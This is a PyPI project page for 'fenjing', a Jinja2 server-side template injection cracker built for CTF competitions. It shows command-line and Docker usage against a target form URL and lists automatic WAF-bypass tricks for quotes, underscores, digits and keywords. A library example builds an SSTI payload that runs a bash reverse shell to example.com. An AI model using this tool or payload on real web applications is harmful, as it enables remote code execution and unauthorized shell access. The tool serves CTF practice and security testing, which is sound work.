A Jinja2 SSTI cracker for CTF competitions

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for marven11 from gravatar.com marven11

Unverified details

These details have not been verified by PyPI
Project links
GitHub Statistics

View statistics for this project via Libraries.io, or by using our public dataset on Google BigQuery

Meta

License: Mozilla Public License 2.0 (MPL 2.0)

Author: Marven11

Classifiers

Project description

焚靖

Bypass the WAF without knowing WAF

焚靖是一个针对Jinja2 SSTI的命令行脚本,具有强大的自动绕过WAF功能

演示

CTFShow web365

python -m fenjing crack --inputs name --method GET --url 'http://xxx/'

快速上手

在以下方法中选择一种

url是表单所在的URL, method是提交表单的HTTP方法, inputs是表单的所有字段,以逗号分隔

下载并运行docker镜像

docker pull marven11/fenjing
docker run marven11/fenjing crack --inputs name --method GET --url 'http://xxx/'

手动安装

git clone ......
cd Fenjing
python -m pip install -r requirements.txt
python -m fenjing crack --inputs name --method GET --url 'http://xxx/'

手动构建Docker镜像

docker build -t fenjing .
docker run -it --net host fenjing crack --inputs name --method GET --url 'http://xxx/'

特性

支持绕过:

  • '"
  • 绝大多数敏感关键字
  • 任意阿拉伯数字
  • _
  • [
  • +
  • -
  • ~
  • {{

自然数绕过:

支持绕过0-9的同时绕过加号或减号

支持全角数字和特定数字相加减两种绕过方式

'%c'绕过:

支持绕过引号,glipsum

下划线绕过:

支持(lipsum|escape|batch(22)|list|first|last)

  • 其中的数字22支持上面的数字绕过

任意字符串:

支持绕过引号,任意字符串拼接符号,下划线和任意关键词

支持以下形式

  • 'str'
  • "str"
  • "\x61\x61\x61"
  • dict(__class__=cycler)|join
    • 其中的下划线支持绕过
  • '%c'*3%(97,97, 97)
    • 其中的'%c'也支持上面的'%c'绕过
    • 其中的所有数字都支持上面的数字绕过

属性:

  • ['aaa']
    • 其中的字符串支持上面的任意字符串绕过
  • .aaa
  • |attr('aaa')
    • 其中的字符串也支持上面的任意字符串绕过

Item

  • ['aaa']
    • 其中的字符串支持上面的任意字符串绕过
  • .aaa
  • .__getitem__('aaa')
    • 其中的__getitem__支持上面的属性绕过
    • 其中的字符串也支持上面的任意字符串绕过

作为库使用

参考example.py

from fenjing import exec_cmd_payload

import functools
import time
import logging

logging.basicConfig(level = logging.WARNING)

def waf(s: str):
    blacklist = [
        "config", "self", "g", "os", "class", "length", "mro", "base", "request", "lipsum",
        "[", '"', "'", "_", ".", "+", "~", "{{",
        "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
        "0","1","2","3","4","5","6","7","8","9"
    ]

    for word in blacklist:
        if word in s:
            return False
    return True

payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"")

print(payload)

Project details

Verified details

These details have been verified by PyPI
Maintainers
Avatar for marven11 from gravatar.com marven11

Unverified details

These details have not been verified by PyPI
Project links
GitHub Statistics

View statistics for this project via Libraries.io, or by using our public dataset on Google BigQuery

Meta

License: Mozilla Public License 2.0 (MPL 2.0)

Author: Marven11

Classifiers

Release history Release notifications | RSS feed

0.6.7

0.6.6

0.6.5

0.6.4

0.6.3

0.6.2

0.6.1

0.6.0.1

0.6.0

0.5.9

0.5.8

0.5.7

0.5.6

0.5.5.1

0.5.5

0.5.4

0.5.3

0.5.2.2

0.5.2.1

0.5.2

0.5.1

0.5.0.2

0.5.0.1

0.5.0

0.4.9.1

0.4.9

0.4.8

0.4.7

0.4.6.1

0.4.6

0.4.5

0.4.4

0.4.3

0.4.2

0.4.1

0.4.0

0.3.9

0.3.8

0.3.7

0.3.6

0.3.5

0.3.4

0.3.3

0.3.2

0.3.1

0.3.0

0.2.9

0.2.8

0.2.7

0.2.6

0.2.5

0.2.4

0.2.3

0.2.2

0.2.1

0.2.0

0.1.7

0.1.6

0.1.5

0.1.4

0.1.3

0.1.0

0.0.2

This version

0.0.1

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

fenjing-0.0.1.tar.gz (18.8 kB view hashes)

Uploaded Source

Built Distribution

fenjing-0.0.1-py3-none-any.whl (19.3 kB view hashes)

Uploaded Python 3

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page